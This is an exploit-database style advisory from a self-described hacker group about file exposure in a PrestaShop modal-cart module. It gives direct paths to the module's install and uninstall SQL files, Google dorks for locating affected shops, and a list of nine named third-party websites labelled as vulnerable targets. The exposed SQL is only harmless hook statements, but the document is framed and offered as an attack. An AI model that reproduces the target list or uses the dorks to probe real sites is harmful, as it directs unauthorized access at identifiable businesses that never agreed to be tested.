PrestaShop PM_ModalCart Modules 1.6.1.4 Database Disclosure

1. #################################################################################################
2.  
3. # Exploit Title : PrestaShop PM_ModalCart Modules 1.6.1.4 Database Disclosure
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 24/12/2018
6. # Vendor Homepage : prestashop.com
7. # Software Download Link : addons.prestashop.com/ru/pop-up/2438-modal-cart-3.html
8. + prestashop.com/forums/topic/102385-module-pm-cross-selling-on-cart-est-maintenant-compatible-avec-modalcart/
9. # Software Price : 40$
10. # Tested On : Windows and Linux
11. # Category : WebApps
12. # Version Information : 1.5.0.14 - 1.4.5.1 - 1.4.7.0 - 1.4.7.3 - 1.4.8.2 - 1.6.1.4±
13. # Exploit Risk : Medium
14. # Google Dorks : inurl:''/modules/pm_modalcart/''
15. intext:''©2018 Recettes & Cabas | Tous droits réservés''
16. intext:''Agence de communication - Une réalisation Communikey''
17. intext:''cron module by samdha.net''
18. intext:''© 2018 - Udviklet og Hosted af Netgiganten.dk''
19. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
20. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
21.  
22. #################################################################################################
23.  
24. # Exploit :
25.  
26. /modules/pm_modalcart/install.sql
27.  
28. /modules/pm_modalcart/uninstall.sql
29.  
30. #################################################################################################
31.  
32. # Example SQL Database Information Exposure =>
33.  
34. install.sql =>
35.  
36. INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCAbove',
37. 'Modalcart above', 'On modal, above the product added to cart', 1);
38. INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCBelow',
39. 'Modalcart below', 'On modal, below the product added to cart', 1);
40.  
41. uninstall.sql
42.  
43. DELETE FROM `PREFIX_hook` WHERE `name` = 'MCAbove';
44. DELETE FROM `PREFIX_hook` WHERE `name` = 'MCBelow';
45.  
46. #################################################################################################
47.  
48. # Example Vulnerable Sites =>
49.  
50. [+] recettesetcabas.com/modules/pm_modalcart/install.sql
51.  
52. [+] boutique-solidaire.com/modules/pm_modalcart/install.sql
53.  
54. [+] voeux-solidaires.com/modules/pm_modalcart/uninstall.sql
55.  
56. [+] kakicrazy.fr/modules/pm_modalcart/install.sql
57.  
58. [+] visuashop.fr/modules/pm_modalcart/install.sql
59.  
60. [+] sac-promo-pas-cher.com/modules/pm_modalcart/install.sql
61.  
62. [+] km-justering.dk/modules/pm_modalcart/install.sql
63.  
64. [+] securedirect.dk/modules/pm_modalcart/install.sql
65.  
66. [+] griffin.ch/modules/pm_modalcart/uninstall.sql
67.  
68. #################################################################################################
69.  
70. # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
71.  
72. #################################################################################################